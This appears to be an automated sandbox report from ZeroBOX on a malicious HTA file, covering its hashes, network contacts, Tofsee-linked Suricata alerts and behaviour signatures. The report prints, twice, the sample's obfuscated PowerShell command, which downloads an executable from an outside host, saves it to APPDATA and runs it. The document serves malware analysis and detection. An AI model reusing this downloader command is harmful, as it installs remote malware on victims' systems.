Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Nov. 2, 2021, 6:33 p.m.	Nov. 2, 2021, 6:35 p.m.

Size	13.6KB
Type	HTML document, ASCII text, with very long lines
MD5	`5c88bf7225ed953a328bf598abfd9ce6`
SHA256	`1a5f35c150f5277966c76cd5883c2e976191fd2af66d7148047e0bb6997e16c0`
CRC32	`F9E9D0F8`
ssdeep	`192:s/4bSbnzV9mJZ4ELnkhKdOrMnOzu2SuR2Y1R5phUqUYff1bXppmitGgyLC/:VOp9oZ4PhKwrSOq2SA5P17DkrC/`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\ziy.hta.html
2132
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2132 CREDAT:145409
  812
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le;
    2464

Name	Response	Post-Analysis Lookup
enoe.net	A 162.0.217.19	162.0.217.19

IP Address	Status	Action
162.0.217.19	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 162.0.217.19:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49168 -> 162.0.217.19:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 2, 2021, 6:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 6:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 6:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 6:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 2, 2021, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 6:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 6:27 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 2, 2021, 6:26 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000029d7e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa810 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa810 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa810 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa650 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa650 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa6c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa6c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa6c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa6c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aab20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aab20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aab20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa3b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa3b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aa3b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab0d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab0d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab140 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab0d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab0d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7ab0d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7d3010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7d3010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7d3010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7d3010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7d3be0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7d3be0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e3a20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e3a20 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7aaa40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4270 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 2, 2021, 6:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b7e4270 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 2, 2021, 6:26 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 311 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 region_size: 3674112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002e40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000031c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007756d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077574000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc5c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc5c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe0c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff4a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007755a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000032a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa7c7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef7019000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000031c0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007756d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077574000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc5c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe0c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff4a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007755a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 region_size: 3870720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 6:26 p.m.	process_identifier: 812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007756d000 process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le;

cmdline

